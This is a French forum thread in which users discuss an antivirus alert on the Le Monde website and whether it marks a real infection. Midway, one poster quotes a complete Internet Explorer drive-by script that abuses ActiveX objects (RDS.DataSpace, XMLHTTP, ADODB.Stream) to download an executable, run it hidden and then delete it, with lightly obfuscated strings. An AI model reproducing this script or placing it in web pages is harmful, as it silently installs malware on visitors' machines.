Meme probleme sur le site du monde.
Config XP SP3 + IE 8.
J'ai tourné Norton, Comodo internet security, spyware terminator et rien trouvé.
Je pense que c'est bien un faux positif.

Je n'arrive pas à reporter le pb à AVIRA

a+

Impossible d'accéder aux articles du Monde depuis ce matin.
J'utilise firefox et antivir.
Je n'ose pas essayer d'accéder par IE et je n'ose pas essayer d'un autre ordinateur.
Comme je ne suis pas le seul, il est vraisemblable que le site du Monde soit infecté.

Des script .js par exemple. mais en theorie ceux ci ne peuvent enregistrer ni acceder au disque dur.
Hors j'ai lu que ce virus permet d'ecrire dans un fichier.

En fait un modele de detection est un moyen de trouver le virus.
Le programme de recherche fait appel au expression reguliere pour trouver des modeles correspondant au virus en question.
Ce qui me gene c'est que ça apparaissent aujourd'hui, et que hier avec IE il n'y avais aucun probleme.
Moi avec FF je n'ai pas le souci mais ma copine elle m'as confirmé que ça n'est apparue seulement que depuis aujourd'hui.
Or pas de MAJ de Antivir sur cette pattern de virus.

Donc soit mise a jour du site, soit piratage du site.

A voir si apres la mise a jour de ce soir de avira le probleme persiste.
Config:
Intel Core I7 920
Asus P6T Deluxe
BFG nVidia GTX280 O/C
Vista 64bits.

Le script en question permettant de sauvegarder sous IE le fichier exe malware

<script>
var ailian,zhan,cmdss;
ailian="ici le path vers l'exe";
zhan="win.exe";
cmdss="cmd.exe";
try{var ado=(document.createElement("object"));
var d=1;
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var e=1;
var xml=ado.CreateObject("Microsoft.XMLHTTP","");
var f=1;
var ln="Ado";
var lzn="db.St";
var an="ream";
var g=1;
var as=ado.createobject(ln+lzn+an,"");
var h=1;
xml.Open("GET",ailian,0);
xml.Send();
as.type=1
var n=1;
as.open();
as.write(xml.responseBody);
as.savetofile(zhan,2);
as.close();
var shell=ado.createobject("Shell.Application","");
shell.ShellExecute(zhan,"","","open",0);
shell.ShellExecute(cmdss," /c del /S /Q /F "+zhan,"","open",0);}
catch(e){};</script>

Moi pendant le scan il m'a trouvé ceci:

The file 'C:\Users\diegodlv\AppData\Local\Temp\plugtmp-1\plugin-data'­
contained a virus or unwanted program 'EXP/Pidief.SD' [exploit]
Action(s) taken:
The file was moved to '4a8a42fb.qua'!

Donc p-e il y etait avant mais ça m'ettonerai.
Le script fait une requete a un serveur et ecrit le resultat dans un fichier qu'il execute.
Le code affiché n'est pas forcement celui qui traine sur Le Monde.fr mais plutot la methode utilisé.

En gros, ce script est une faille permettant d'executer du code, n'importe lequel.

Si vous n'etes pas infecté tant mieu.
Moi j'ai refait un scan et aucune detection.

Pour ne plus etre embeté par ces alertes je vous conseille d'utiliser Firefox (ou Opera). Config:
Intel Core I7 920
Asus P6T Deluxe
BFG nVidia GTX280 O/C
Vista 64bits.